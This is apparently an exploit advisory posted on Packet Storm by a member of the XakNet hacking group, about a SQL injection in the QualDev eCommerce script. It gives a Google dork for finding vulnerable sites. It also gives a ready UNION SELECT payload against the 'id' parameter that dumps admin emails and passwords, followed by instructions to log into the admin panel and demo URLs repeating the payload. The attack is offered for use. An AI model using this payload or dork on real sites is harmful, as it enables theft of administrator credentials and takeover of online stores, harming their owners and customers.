The QualDev eCommerce script suffers from a remote SQL injection vulnerability.
13dcbe404016dabb654ca408e807871f75a29f71d7b84b3419b42b8e452dbceb====================================================
QualDev eCommerce script SQL injection vulnerability
====================================================
# Exploit Title: QualDev eCommerce script SQL injection vulnerability
# Vendor: http://www.qualdev.com
# Date: 15.12.2010
# Version: all version
# Category:: webapps
# Google dork: inurl:"index.php?file=allfile"
# Tested on: FreeBSD 7.1
# Author: ErrNick
# Site: XakNet.ru, forum.xaknet.ru
# Contact: errnick[at]xaknet[dot]ru
# Greatz 2 all memberz of XakNet team ( X1mk0~, Saint, baltazar, SHYLLER,
Kronus, mst && others)
# Intro:
- A parameter is not properly sanitised before being used in a SQL query.
- Input passed to "id" parameter is not properly
- sanitised before being used in a SQL query. This can be
- exploited to manipulate SQL queries by injecting
- arbitrary SQL code.
# Exploit:
index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
logining with admin email && password there
http://victim/adminpanel/
#Demo:
-
http://www.site.com/index.php?file=allfile&id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
-
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
-
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
Vizit us at http://xaknet.ru
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed